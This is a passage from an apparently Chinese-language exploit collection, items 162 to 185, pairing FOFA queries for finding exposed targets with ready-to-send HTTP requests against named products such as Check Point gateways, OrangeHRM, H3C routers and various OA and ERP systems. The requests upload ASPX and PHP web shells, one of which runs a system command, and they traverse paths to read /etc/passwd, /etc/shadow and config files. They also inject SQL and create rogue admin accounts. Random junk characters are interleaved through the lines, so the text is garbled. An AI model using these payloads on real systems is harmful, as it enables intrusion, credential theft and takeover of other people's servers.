* g, \1 m4 g& i. z! m<UploadResume xmlns="http://tempuri.org/">. L4 N- S# F2 l, {# l8 C3 H
<ip>1</ip>; w- m' `/ a0 o1 G6 H
<fileName>../../../../dizxdell.aspx</fileName>
- a7 \. u( n0 R<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>5 H7 H) A( p5 ~: D2 ^+ k$ C7 B1 `
<tag>3</tag>
% h3 L2 a' g4 ~1 \</UploadResume>
/ B. f1 T( p0 |# H* H) M) |</soap:Body>1 t4 n/ h# P3 Y. w3 `
</soap:Envelope>
2 m: q- a( A- m
# R1 H8 U$ M& m* g( K# X4 V( s2 N/ h8 Z: U
http://x.x.x.x/dizxdell.aspx; e" A8 ^2 G( h# v7 L! U
# S) a: n6 y, E8 |1 C, S* ~
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
% y: C3 Z6 d7 h; U; k: E6 _FOFA: app="和丰山海-数字标牌"5 T1 _; _9 \# I9 J9 u0 s5 O
POST /QH.aspx HTTP/1.1
$ x7 J! n( V! _( ?0 p' VHost: x.x.x.x2 o% u" x D+ X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0: t+ C8 b; `# k5 D/ C0 P+ i
Connection: close3 J7 ?# h' o' z* e
Content-Length: 583
, }+ @+ e; W( J- d, h( x: r, N$ oContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
8 }& [8 x$ o8 d) x6 m; bAccept-Encoding: gzip
: b, ?' S3 g; W6 f9 k0 Q* r1 X- i6 t* |. n* L! K% i! \
------WebKitFormBoundaryeegvclmyurlotuey, [6 h* m, l: v1 x
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"0 u8 M& ^; W4 i" j4 y
Content-Type: application/octet-stream
+ P6 O7 D- C. ?2 B
# o$ p1 K! `6 C8 r4 s+ B<% response.write("ujidwqfuuqjalgkvrpqy") %>1 J. N. @$ G+ L% P7 {
------WebKitFormBoundaryeegvclmyurlotuey* u* t. g1 G* r0 [, L" Y# w
Content-Disposition: form-data; name="action": h7 v! `6 n1 f+ t" C
# H, R$ I2 h/ g( h# N
upload8 q9 e; ~( j" J7 D0 @* t- G
------WebKitFormBoundaryeegvclmyurlotuey
+ l A. L! h6 P" i4 E3 k& U' zContent-Disposition: form-data; name="responderId"; w: q7 ]( _2 [0 Y1 U- v/ ^4 d1 Z$ ^# u
- Z4 E. L0 ^; I
ResourceNewResponder
4 J+ f" e ~+ }' y------WebKitFormBoundaryeegvclmyurlotuey
1 L8 q H7 L3 u8 G- cContent-Disposition: form-data; name="remotePath"/ [' p% P4 m& b) f) i) ?
% n- R) o9 u* G/ _/opt/resources$ v* f+ |$ F3 b! p! u$ B( S
------WebKitFormBoundaryeegvclmyurlotuey--2 R9 w# ]; ^7 c2 c, i8 S) U
. @4 U. k7 {: P% T
! s* U, B, i+ y+ h1 z- Q$ _
http://x.x.x.x/opt/resources/kjuhitjgk.aspx5 q: `9 |( j; X0 M* j1 R/ O4 b
) I4 ?% k6 |$ h$ \( q
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传/ o4 {9 q7 ?' e; p
FOFA: icon_hash="-795291075"0 ]+ E- ?# ^+ M) d( h
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1$ o3 f1 B( S1 E y
Host: x.x.x.x
: g4 r0 @, {# e, dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36- o6 j6 ?% A% m' r1 k- e. I" E, ~
Connection: close
+ u4 X) i; f' W9 d3 KContent-Length: 293$ X N( H& o6 k
Accept: */*2 `, [; l- h2 H
Accept-Encoding: gzip, deflate
; F, I, f' Q7 m* M/ AAccept-Language: zh-CN,zh;q=0.9
3 w: k" ^; [, d7 ~8 AContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod" g( Y7 X# g- S2 a3 U* h
- h3 w7 ?$ P6 Y9 j/ x g. _: H
------iiqvnofupvhdyrcoqyuujyetjvqgocod
# I0 g' C5 ~: y, h& uContent-Disposition: form-data; name="name", T5 b, t W8 P% b0 Q- }
) v3 z) {: O, g' [: P
1.php, R3 o$ F/ ?9 I7 I- _
------iiqvnofupvhdyrcoqyuujyetjvqgocod
0 E( L1 X* l7 r" pContent-Disposition: form-data; name="upfile"; filename="1.php"
6 w' Z4 `4 m: h, h2 z: vContent-Type: image/jpeg! r, g \7 B% V2 X. ?9 U; F
/ r! q% }# z5 d: L/ ^ Srvjhvbhwwuooyiioxega
6 a0 a: q* Q9 q. ~& V------iiqvnofupvhdyrcoqyuujyetjvqgocod--
; R" h: P( A% y0 u) E/ k; L y: |/ ?/ \9 A2 k
7 H3 N4 U; d6 U
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
- |- ^6 g8 u+ fFOFA: title="智慧综合管理平台登入"
( m: d0 }& @2 MPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1# `! x3 O8 E% h5 p) g
Host: x.x.x.x; t9 x" {$ ]% v% b; |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
/ n$ J3 l/ D5 \, C0 [1 b8 [Content-Length: 288
& ?; F1 W, {/ a) m" xAccept: application/json, text/javascript, */*; q=0.01
F" O* }" v7 n7 g( A' a4 V7 rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,, {7 F6 g, k0 O# k% r
Connection: close5 t% k% T* a6 @: \
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl4 n X/ U' M% }6 D, l
X-Requested-With: XMLHttpRequest
% I/ Y, R# ~6 IAccept-Encoding: gzip5 @) ~/ p# J+ K9 Z" F$ `
; x: ]5 u( d( d4 u$ r- x------dqdaieopnozbkapjacdbdthlvtlyl
) Z1 j- e' v) Z5 D% @' DContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"/ `) q4 B5 O( ^( ?) B! [$ |
Content-Type: image/jpeg
- h' u+ o3 {0 r$ j o) Y
$ d$ _' Y) y( `1 ?6 ~<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>5 G' d; Z# h+ K! c t3 P8 Q k# W( h. P
------dqdaieopnozbkapjacdbdthlvtlyl--" ^8 W3 K) E& }0 n
8 \! m* X. T6 n8 y4 y8 J/ ^2 p2 U5 f
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
; F A5 J% }7 c( [3 d$ \8 }+ h7 K. z
0 \ d9 [6 ^/ V) q$ _165. OrangeHRM 3.3.3 SQL 注入! ]6 p4 i' G% x5 I
CVE-2024-36428
}7 i0 h" _, N3 f- pFOFA: app="OrangeHRM-产品"6 u; g, z' d- m. b& a" b2 X
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))# ?: }9 q+ B& o/ {7 n
! Q2 T$ W* m; M
( S$ U+ x7 r. x' G166. 中成科信票务管理平台SeatMapHandler SQL注入7 t( s! |$ q ~! L4 C2 e
FOFA:body="技术支持:北京中成科信科技发展有限公司") {) ` F6 L9 Q) W _, e+ o
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
' |3 Z8 w. l1 r- z; f) h+ RHost:' F$ X" x" \- K7 H7 D
Pragma: no-cache
8 K- A) f. u7 j# o: J6 u* X$ N+ nCache-Control: no-cache/ M' W/ m7 I* Y+ c4 t9 `
Upgrade-Insecure-Requests: 1
8 J, G" R4 g% |9 H# C/ K9 C; ?4 {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
" l+ v$ h7 i/ q/ U2 w S$ GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; r' U6 s" D# ?' [( c e2 K( cAccept-Encoding: gzip, deflate
* F, H8 M7 h, q4 V B% nAccept-Language: zh-CN,zh;q=0.9,en;q=0.81 Y @8 _& ~; d7 p
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
! ~0 Y. ]+ {# Q4 e4 T. ~Connection: close
5 z% q6 W7 V5 Y- h& q1 UContent-Type: application/x-www-form-urlencoded
3 A: [+ E" E9 a0 X7 s7 lContent-Length: 89
, ?+ a+ U2 A* q7 e; z1 ?( g. x2 D r9 d; a/ p
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
; m/ K! U2 n" Q4 H$ B* i) m+ `5 w- T$ l" `$ ^) G' q* [
0 u, f8 @& i" Q! x) z167. 精益价值管理系统 DownLoad.aspx任意文件读取
- O3 C) ^9 B+ Z: j; w4 xFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"1 K8 O5 n% D* s+ q1 h2 r
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1 U5 B) f5 @$ A* J( G
Host:
0 [6 M6 E9 K P& i4 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* e9 W& p& l. u1 oContent-Type: application/x-www-form-urlencoded
% }1 L1 o- m$ O7 \$ JAccept-Encoding: gzip, deflate
* g5 T: a& R- `+ gAccept: */*
) R! t3 T$ F8 H$ hConnection: keep-alive
! `; y1 p+ ?6 L' ]9 ?+ B2 m+ B. z6 O1 g: g* I7 r, U4 A8 T
% {9 L% r H, P _, a) W/ J; O168. 宏景EHR OutputCode 任意文件读取! O4 m9 F1 j! n& w
FOFA:app="HJSOFT-HCM"& e! D$ n/ O2 U. B9 D
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.17 F# \8 Z. C5 [2 |
Host: your-ip! N- P1 _2 t9 A2 ~0 N* p. S7 ^, h! D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36/ q% S3 [9 o( T, H. d5 X) m1 _, Y
Content-Type: application/x-www-form-urlencoded1 \) K: I' ~( L' l! D, S! {
Connection: close
2 L( R+ V) h; D, V# @7 P
5 ?% q& J6 U! s" D) t
% G8 v9 y! C: v( H9 E
; N( D" ]* @1 ~) G+ x9 U- `169. 宏景EHR downlawbase SQL注入
5 ?' e& ^, Y" H5 A8 Z! YFOFA:app="HJSOFT-HCM"5 q- q$ f3 ^5 G* X" a
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.13 u$ L6 ?5 W& f4 }
Host: your-ip
0 a- x4 j% y6 B4 y* t! nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% A9 [* _5 E6 v6 n
Accept: */*& w7 |6 G" @5 `# O: T4 P
Accept-Encoding: gzip, deflate
' ~6 Y5 `% e) M$ o) X& SConnection: close
! i* y& @) }! _, g4 d: s* R
+ v: G( l4 v8 l" f0 a7 z8 h) ^( X2 Q! H7 ^# ^8 n7 P# J1 b; a3 l
" T, `2 u8 h; G+ V G. d$ A170. 宏景EHR DisplayExcelCustomReport 任意文件读取
1 O/ a, ^" q9 h3 J8 h0 aFOFA:body="/general/sys/hjaxmanage.js") @' b9 y2 p3 v- q4 D
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
/ v0 `7 g. ~& I n. q( N- r5 zHost: balalanengliang
" ~7 `. Z" r) {, N& e" i# I4 \ G( hUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 b/ _3 D" S: [1 h
Content-Type: application/x-www-form-urlencoded+ q! P9 T' d: i/ Y! a1 O
% C& L0 ~, K4 Q/ e; ufilename=../webapps/ROOT/WEB-INF/web.xml4 r* N& Y% C4 d: K2 H2 }
& }2 \( F1 v* r
& n# r m- \( K% w; m; I171. 通天星CMSV6车载定位监控平台 SQL注入/ e# Q& c4 R" Z: R, I
FOFA:body="/808gps/"9 z- Q0 [8 j3 u, P
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
) m$ J. M. p* q& }Host: your-ip8 K$ R/ s+ J z$ _. Y% U: `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0- Q. V% L! m8 n: H/ ?% v: a+ @
Accept: */*
, ]. O4 g9 `0 LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ U0 X. x) H4 S) U/ J; t$ ?Accept-Encoding: gzip, deflate6 _ J y# g3 R9 H, P
Connection: close
0 k! n* T0 |( }* s8 ?" \. z! N5 X: r, f' M- M; U4 V8 G: Q
+ n& i0 e! n' q* u3 i( d; D* p
172. DT-高清车牌识别摄像机任意文件读取0 g' E6 p! e5 g* n% h1 n: R4 s
FOFA:app="DT-高清车牌识别摄像机"5 {- @6 W( c2 g4 j! V1 ~8 _
GET /../../../../etc/passwd HTTP/1.1
6 ], [3 ]: x( Y0 eHost: your-ip+ \, H( W" ^+ N x- l( M2 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 l5 q4 t6 t3 t7 u" e1 ~
Accept-Encoding: gzip, deflate
6 f; W3 _; N: h2 xAccept: */* G/ f) ]( }/ ]3 v( e
Connection: keep-alive
, w3 o( y; C4 f# f5 r* e$ K+ J( d$ t8 A! h0 l
* a( e# y: f! c' ~, J' j
" O. E& \& ^9 h9 l" ] l8 f
173. Check Point 安全网关任意文件读取
( Y; v5 l! s4 KCVE-2024-24919
" f6 d l# L T6 W R6 h7 R- QFOFA:app="Check_Point-SSL-Network-Extender"
- D: T& g& r! i5 F4 h8 BPOST /clients/MyCRL HTTP/1.1' P$ d- {- B: C: H! _7 c L6 H
Host: your-ip
7 A, I5 g0 R; T$ kContent-Type: application/x-www-form-urlencoded
6 s3 D! ]* P* {7 t0 `
5 l0 \& ^. y& n. r9 Q8 AaCSHELL/../../../../../../../etc/shadow
# r$ C4 s4 |9 l& k: ?6 N3 ~" ~9 v* C$ v/ V1 S
e q+ {% M7 B4 m E5 N7 E+ a4 m6 H) R! N. \
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
- K6 }! r- t, N, H9 C! {3 I5 QFOFA:app="金和网络-金和OA"
* m. E% V5 f, O, zGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
3 u5 P5 Q. |9 n3 q5 `Host: your-ip
/ g7 @& J( q* c9 T9 S4 R* h/ P* kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.363 i9 G/ A3 z6 v% T( P$ E4 g2 }# ~$ |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- H9 d |9 j$ S. E# sAccept-Encoding: gzip, deflate, br
: O! V3 Q) [/ m3 kAccept-Language: zh-CN,zh;q=0.9+ d- X, ]/ H. i2 }( @" p
Connection: close+ V1 l% r( W5 i( p1 w
* M) l( |* o/ W: W3 K
' N+ y/ Z+ o( s
$ f; z8 T6 j" d) r175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
$ V* d3 ^; ^% c" SFOFA:app="金和网络-金和OA"
8 E" F, i7 n n* iGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
) X2 L. ~3 |* a# {* THost:) y7 m" e# y. S; Y4 a
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36' ^$ D: o5 E4 Z6 C P+ ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" m3 `( @( N. ]% @1 Y4 K* l3 x$ }
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 o0 I V/ i3 ^1 ]Accept-Encoding: gzip, deflate q; W$ }6 u* _, k- a6 T" q
Connection: close& v9 K( E) @- \ J& @/ O! S
Upgrade-Insecure-Requests: 1
: Y: a3 O% {$ Y: P* e
& J& K) N$ f, w
% u6 ^6 ^2 a a) J+ _176. 电信网关配置管理系统 rewrite.php 文件上传5 \: p, h9 p# z
FOFA:body="img/login_bg3.png" && body="系统登录"
0 c: ?' M* z* ?# tPOST /manager/teletext/material/rewrite.php HTTP/1.1% w! n0 \, w8 b" m$ S1 r
Host: your-ip- Z: f( M/ W+ G" {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0 k% _6 {% z, Q/ x; E: ^, |
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
: a- ]6 s0 P6 w/ iConnection: close
8 U# M0 G% C* u3 v, Y4 c5 l# G1 ?+ t3 B& q1 o) j
------WebKitFormBoundaryOKldnDPT1 Z7 n% m: ?, P) c+ e6 V. a; H( F
Content-Disposition: form-data; name="tmp_name"; filename="test.php"; O* y9 P9 k% d
Content-Type: image/png
8 y8 q4 W- F$ M6 Z ! b) o! n' l8 o4 }
<?php system("cat /etc/passwd");unlink(__FILE__);?>
; s8 a4 ]$ v4 i------WebKitFormBoundaryOKldnDPT
' _+ n6 O; E' Z0 k- aContent-Disposition: form-data; name="uploadtime"
l3 s5 f$ ^/ n7 ?
! x6 Q6 U% P" h5 f' p9 T
6 g$ x' m) q2 z4 M------WebKitFormBoundaryOKldnDPT--5 P3 k/ @ F9 J
6 h5 F2 V' [$ G* @0 t1 ~3 p
* B1 @3 n' ?+ h8 `6 r9 Q
2 U) ^- C/ W X5 g, t177. H3C路由器敏感信息泄露# q+ k- ]4 {! z( h. _
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
6 Z+ s3 `3 x0 E/userLogin.asp/../actionpolicy_status/../M60.cfg
/ ?4 }" @; X2 g7 \* l4 x% r# b8 i' v* u/userLogin.asp/../actionpolicy_status/../GR8300.cfg/ G9 n( L$ Y1 \# X1 O; W
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
* \8 Q! \7 G: b3 g$ N- D" ~0 K/userLogin.asp/../actionpolicy_status/../GR3200.cfg" l$ z! _! A' M- T
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
4 n1 o% {! ^ N6 |/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
5 P$ [4 I( [1 B5 ~/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg- q o7 g8 g. N% i
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg" n' t8 U( E3 b0 S+ v. f0 q# g
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg/ o3 U; u/ N* m4 e' q4 n
/userLogin.asp/../actionpolicy_status/../ER5200.cfg" `6 `2 L+ s8 C7 F- k) h( B1 h
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
0 v) I k( W7 r7 x1 p+ j8 D* }/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg5 H+ e6 v# o, X1 j
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
' c3 [( N% n# L/ P! m/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
8 j6 T( ?: {8 X' ]$ O6 Q. D& B7 {) @, w/userLogin.asp/../actionpolicy_status/../ER3200.cfg: u3 U. g$ _: g
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
$ U9 ?* S- b, H; j2 B/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
( @1 E) L% c7 a, h( M* g: u/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg" u& [- G, W1 v6 W0 u/ Z% [5 z
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
- E! q# j* o+ Z |$ f, n/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
/ ?3 n+ u+ n: g5 f9 i: r7 V2 I' h0 d& q. y; a
% e4 k( }7 [$ Y1 I* H178. H3C校园网自助服务系统-flexfileupload-任意文件上传
9 ?9 Y: n/ ?( h' B8 E5 t8 j; XFOFA:header="/selfservice": W6 [/ ?0 d5 Y4 O9 p
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1: f3 {0 u/ g' F# u; Y' l; c+ F2 N
Host:& `( m7 Z/ X2 }( v: t- F9 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.361 r; }+ V4 ?0 D+ w
Content-Length: 252
' n5 J/ \& B, t6 Z: sAccept-Encoding: gzip, deflate
2 U. v# L" M( v0 T" XConnection: close
; a" g! k, x+ c6 k6 L. U; ]Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
# O1 E+ \ H2 b% B* q) T$ M% D-----------------aqutkea7vvanpqy3rh2l8 [: t% e( U* u$ z T
Content-Disposition: form-data; name="12234.txt"; filename="12234"% X! P/ m% B0 B6 B
Content-Type: application/octet-stream3 ]! ?: a* R7 P% N$ i, c
Content-Length: 255
7 p5 K8 F; i4 Q6 }
, L$ s6 ~ q8 Q9 g& F+ |) @* M12234( a' u W$ j/ ^* d* J& F
-----------------aqutkea7vvanpqy3rh2l--$ q6 m" X; d+ F6 E2 |
$ k8 q. F, T% o% w7 H
3 n, I; O, g# y6 PGET /imc/primepush/%2e%2e/flex/12234.txt
! P% ?4 w$ _! d$ @; P
7 U4 g: p, [8 y& v- p. L% m/ Y2 i7 A# K! N
179. 建文工程管理系统存在任意文件读取, w* x) l6 b+ x8 b( {
POST /Common/DownLoad2.aspx HTTP/1.12 L+ v. I' Q7 _6 L
Host: {{Hostname}}6 j( t- B3 b% q
Content-Type: application/x-www-form-urlencoded
: E v4 _# F. L2 zUser-Agent: Mozilla/5.0$ Q2 n+ f" ]2 y" v
$ k& u- f8 g! U3 ?path=../log4net.config&Name=
# `6 A/ k4 W! V2 {9 x# Y, [) X( Z. ~& Z, d& K! y8 n
7 R* }" \' q: s4 k" @2 k+ N
180. 帮管客 CRM jiliyu SQL注入
% Q; N5 Z9 |* k5 @$ e( w CFOFA:app="帮管客-CRM"
: O9 D7 F* o( X# i* \; cGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1! Y: l9 @, X4 o4 g1 v! l/ M5 R
Host: your-ip, o8 ]9 Y8 M! Z) _, @" @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36& ? `1 M+ d* n8 O" s1 f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ r* S/ v$ n" z8 v+ F" dAccept-Encoding: gzip, deflate
" i, D5 A/ z2 H' ~1 e* R+ ^6 `- CAccept-Language: zh-CN,zh;q=0.99 ~7 `# v" D M0 `
Connection: close. s. C% R7 F) Z) r6 P
% H5 o% c. P- C
1 a" K y/ g1 H. d
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入' y1 _8 U- d: o" P1 o5 D H
FOFA:"PDCA/js/_publicCom.js"
) n! i9 F% H* I% Y" }& \POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
5 ]- i/ r& O7 THost: your-ip
F% _8 L; X5 m; m. ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.361 p& e! [7 C9 p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 E4 a' U0 |: D+ {& U& l J
Accept-Encoding: gzip, deflate, br
/ _7 B0 O5 N3 E6 H- F3 tAccept-Language: zh-CN,zh;q=0.9
7 x# \0 Q% H2 G! |5 ~Connection: close
" }! ?* O! z4 H/ H0 ]Content-Type: application/x-www-form-urlencoded2 X% k- m. c; T r0 b- C
4 g- \2 b7 q+ }2 A9 w* D
1 ]; v' q) E, ^; j# {0 C! saction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
* U6 C9 @3 I5 [/ w d( U( t
8 W {8 ^9 B/ E9 V# t/ Y" P. U) x" P7 L. ]: O" _; ?
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建" _$ Z1 l" n" V' i, o2 O
FOFA:"PDCA/js/_publicCom.js"
# s5 ?+ _* b& H: v( G. y. ^POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1- r- O6 W7 h8 p% z; `' s
Host: your-ip
- K/ ?4 H( ^/ M5 P& SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36, J+ L9 k7 J) v- z; }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- ~! W r7 |& X! U) P# F: R8 OAccept-Encoding: gzip, deflate, br
4 z2 Z. [: z1 y) O# e* b2 C/ {4 NAccept-Language: zh-CN,zh;q=0.9
+ S; n5 k+ _" X& r# a5 [) wConnection: close
. }: f7 [; S) i7 SContent-Type: application/x-www-form-urlencoded
6 b6 D! w+ W" `
1 y3 e. C `4 s) I' s- x( A, O4 D8 B& {# Q8 ~! |- t
username=test1234&pwd=test1234&savedays=1# M$ @- p( h& R
& p6 _7 r' y, k+ ~
, r8 w- H- _& R" I183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入6 c* _4 C" d( v4 ^$ E4 h
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
: _; N1 U% S4 y- K. O7 TGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1$ a9 p, \3 P( s1 D3 u
Host: your-ip( H) `1 D- c6 j3 W" g% Y7 ]% Q4 N
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
2 f( L- |3 {. d7 i' w1 P: rAccept-Charset: utf-8! Z# u. C$ c; b; H: T
Accept-Encoding: gzip, deflate
9 F3 Y. X: g2 g; e0 nConnection: close1 P6 J, Q2 [& o; ?9 O2 `( J, t
0 T& c0 D; q6 D4 H2 _
" x3 d/ U+ j* ]7 n/ R$ t- Z# |, c1 O3 c184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
/ D0 i; D! V" z& ^% z/ E8 iFOFA:server="SunFull-Webs"8 a$ R2 o' d. C. b. J" q, A
POST /soap/AddUser HTTP/1.1
* N( B# c" Y, D e& AHost: your-ip$ a: K% V' o1 ^3 G# t$ X6 s1 W$ J
Accept-Encoding: gzip, deflate R( z! J/ ^) s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0$ Q) p% w) {( n4 _
Accept: application/xml, text/xml, */*; q=0.01( ^. ^% }% M" l. V0 |* R3 Z! ^7 x
Content-Type: text/xml; charset=utf-8
4 V- q7 j9 Q- D m: KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 m% U6 P8 U/ U! ]2 h4 d( W0 q
X-Requested-With: XMLHttpRequest
: Z- o2 q2 L3 ~9 |' q4 w1 ]: D1 I" c. J% I
# d1 R+ f) @2 s$ ?. Einsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
% f$ t" T; E* Z: d5 p, R. E4 F2 H% i
% V3 s s8 {- b, K
185. 瑞友天翼应用虚拟化系统SQL注入& Q l! r4 }0 X4 s
version < 7.0.5.17 {6 v) p% P5 U3 T
FOFA:app="REALOR-天翼应用虚拟化系统"
